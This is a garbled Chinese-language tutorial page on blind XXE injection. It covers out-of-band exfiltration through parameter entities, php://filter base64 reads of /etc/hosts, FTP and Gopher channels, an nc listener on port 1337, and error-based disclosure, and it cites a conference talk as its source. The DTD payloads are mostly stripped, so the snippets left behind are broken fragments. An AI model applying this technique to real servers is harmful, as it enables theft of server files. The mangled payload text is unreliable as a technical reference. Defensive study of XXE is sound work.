【注入】xml盲注

OOB(Out-Of-Band):外带数据
多数情况下,能直接返回目标内容的攻击场景很少,因此需要一些技巧
来获取我们想要的数据。
• 参数实体(Parameter Entity):
如果说实体是XML节点中引用的内容,那么参数实体就是实体中引
用的内容。

">
1)参数实体只能在DTD声明中使用。
2)参数实体中不能再引用参数实体。





    
    %dtd;
    %send;
]>



">%all;

PHP环境下可以使用php://filter:
php://filter/read=convert.base64-encode/resource=/etc/hosts
利用FTP协议外带数据
两者相结合




%asd;
%c;
%rrr;
]>



">

Gopher:古老的信息查找协议 【Java1.6】
格式:gopher://{host}:{port}/{type}{request}
• type:为一位整型数字
• request:任意要发送的请求内容,使用URL格式编码。

在服务器中使用NC监听指定端口:
nc –lnp 1337




%dtd;
]>


">%all;

无效文件名构造主动报错
evil.xml



%one;
%two;
%four;
]>


">

资料来源:5-XML实体攻击:从内网探测到命令执行步步惊心-张天琪.pdf

你可能感兴趣的:(【注入】xml盲注)